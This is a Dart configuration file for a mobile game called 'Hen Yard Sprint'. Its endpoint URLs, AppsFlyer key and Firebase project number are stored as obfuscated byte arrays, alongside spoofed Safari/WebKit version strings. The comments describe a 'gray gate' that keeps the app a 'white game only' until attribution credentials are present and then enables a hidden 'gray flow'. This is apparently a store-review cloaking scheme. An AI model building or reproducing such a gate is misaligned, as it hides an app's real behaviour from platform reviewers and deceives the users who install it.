import '../core/grain_cipher.dart';

/// All secrets are stored as obfuscated byte arrays (never plaintext).
/// Regenerate with `dart run tool/encode_coop_values.dart` after changing
/// the cipher seed in lib/coop/core/grain_cipher.dart. The gray gate stays
/// disabled (white game only) until endpoint + AppsFlyer key + Firebase
/// project number are all present.
abstract final class CoopRelayConfig {
  static const String appTitle = 'Hen Yard Sprint';
  static const String bundleId = 'com.henyardsprint.henyardsprintgame';

  /// iOS App Store numeric id (used for GCD + store_id).
  static const String iosStoreId = '6790311741';

  static const int pushSnoozeSeconds = 259200; // 3 days
  static const int organicRecheckSeconds = 6;

  // ── Encoded secrets (generated by tool/encode_coop_values.dart) ──────────
  static const List<int> _endpoint = <int>[
    167, 239, 79, 12, 10, 255, 24, 248, 27, 247, 172, 29, 44, 58, 188, 104,
    108, 134, 253, 157, 77, 92, 221, 95, 12, 109, 199, 118, 94, 20, 199, 136,
    250, 88, 201, 126,
  ];
  static const List<int> _privacy = <int>[
    167, 239, 79, 12, 10, 255, 24, 248, 27, 247, 172, 29, 44, 58, 188, 104,
    108, 134, 253, 157, 77, 92, 221, 95, 12, 109, 212, 121, 89, 36, 191, 132,
    69, 21, 209, 125, 172, 24, 113, 152, 95, 207, 177, 107, 76,
  ];
  static const List<int> _support = <int>[
    167, 239, 79, 12, 10, 255, 24, 248, 27, 247, 172, 29, 44, 58, 188, 104,
    108, 134, 253, 157, 77, 92, 221, 95, 12, 109, 215, 124, 96, 30, 205, 147,
    64, 22, 201, 130, 173, 27,
  ];
  static const List<int> _appsFlyerKey = <int>[
    129, 180, 43, 15, 223, 61, 48, 28, 234, 220, 165, 241, 53, 10, 205, 106,
    114, 104, 200, 119, 41, 100,
  ];
  static const List<int> _firebaseProject = <int>[
    117, 178, 19, 204, 204, 248, 34, 251, 233, 197, 112, 221,
  ];
  static const List<int> _gcd = <int>[
    167, 239, 79, 12, 10, 255, 24, 248, 26, 245, 162, 23, 47, 51, 134, 86, 108,
    132, 7, 149, 69, 167, 223, 98, 205, 161, 211, 116, 31, 23, 204, 148, 64, 73,
    205, 122, 159, 19, 111, 147, 146, 150, 179, 51, 14, 248, 242,
  ];

  static const List<int> _webkit = <int>[117, 171, 16, 202, 200, 243, 26, 254];
  static const List<int> _safari = <int>[112, 179, 9, 209];
  static const List<int> _safariTail = <int>[117, 171, 15, 202, 200];

  // OneLink is OPTIONAL — it must NEVER be part of the gate-enable check.
  static const List<int> _oneLinkHost = <int>[
    167, 224, 73, 21, 248, 55, 77, 60, 35, 4, 167, 18, 63, 246, 199, 99, 97,
    128, 253, 157, 68, 92, 231, 85,
  ];

  static String get endpoint => unscrambleGrain(_endpoint);
  static String get privacyUrl => unscrambleGrain(_privacy);
  static String get supportUrl => unscrambleGrain(_support);
  static String get gcdBase => unscrambleGrain(_gcd);
  static String get webKitVersion => unscrambleGrain(_webkit);
  static String get safariVersion => unscrambleGrain(_safari);
  static String get safariTail => unscrambleGrain(_safariTail);
  static String get appsFlyerKey => unscrambleGrain(_appsFlyerKey);
  static String get firebaseProjectNumber => unscrambleGrain(_firebaseProject);
  static String get oneLinkHost => unscrambleGrain(_oneLinkHost);

  static String get storeToken => 'id$iosStoreId';

  /// Gate needs config endpoint + AF key + Firebase project number.
  /// Never add optional fields (e.g. OneLink) here — a missing optional value
  /// would silently disable the whole gray flow.
  static bool get grayCredentialsReady =>
      endpoint.isNotEmpty &&
      appsFlyerKey.isNotEmpty &&
      firebaseProjectNumber.isNotEmpty;
}
